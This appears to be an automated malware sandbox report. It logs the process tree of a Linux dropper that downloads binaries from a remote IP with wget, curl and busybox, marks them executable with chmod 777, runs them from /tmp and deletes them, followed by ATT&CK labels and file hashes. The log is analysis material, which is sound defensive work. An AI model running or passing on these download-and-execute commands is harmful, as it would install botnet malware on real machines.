/bin/busybox/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:1607
-
/bin/chmodchmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- File and Directory Permissions Modification
PID:1608 -
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Executes dropped EXE
PID:1609 -
/bin/rmrm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:1610
-
/usr/bin/wgetwget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:1611
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Writes file to tmp directory
PID:1612 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:1613
-
/bin/chmodchmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- File and Directory Permissions Modification
PID:1614 -
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Executes dropped EXE
PID:1615 -
/bin/rmrm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:1616
-
/usr/bin/wgetwget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:1617
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Writes file to tmp directory
PID:1618 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:1619
-
/bin/chmodchmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- File and Directory Permissions Modification
PID:1620 -
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Executes dropped EXE
PID:1621 -
/bin/rmrm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:1622
-
/usr/bin/wgetwget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:1623
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Writes file to tmp directory
PID:1624 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:1625
-
/bin/chmodchmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- File and Directory Permissions Modification
PID:1626 -
/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Executes dropped EXE
PID:1627 -
/bin/rmrm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:1628
-
/usr/bin/wgetwget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:1629
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Writes file to tmp directory
PID:1630 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:1631
-
/bin/chmodchmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- File and Directory Permissions Modification
PID:1632 -
/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Executes dropped EXE
PID:1633 -
/bin/rmrm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:1634
-
/usr/bin/wgetwget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:1635
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Writes file to tmp directory
PID:1636 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:1637
-
/bin/chmodchmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- File and Directory Permissions Modification
PID:1638 -
/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Executes dropped EXE
PID:1639 -
/bin/rmrm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:1640
-
/usr/bin/wgetwget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:1641
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Writes file to tmp directory
PID:1642 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:1643
-
/bin/chmodchmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- File and Directory Permissions Modification
PID:1644 -
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Executes dropped EXE
PID:1645 -
/bin/rmrm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:1646
-
/usr/bin/wgetwget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:1647
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Writes file to tmp directory
PID:1648 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:1649
-
/bin/chmodchmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- File and Directory Permissions Modification
PID:1650 -
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Executes dropped EXE
PID:1651 -
/bin/rmrm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:1652
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97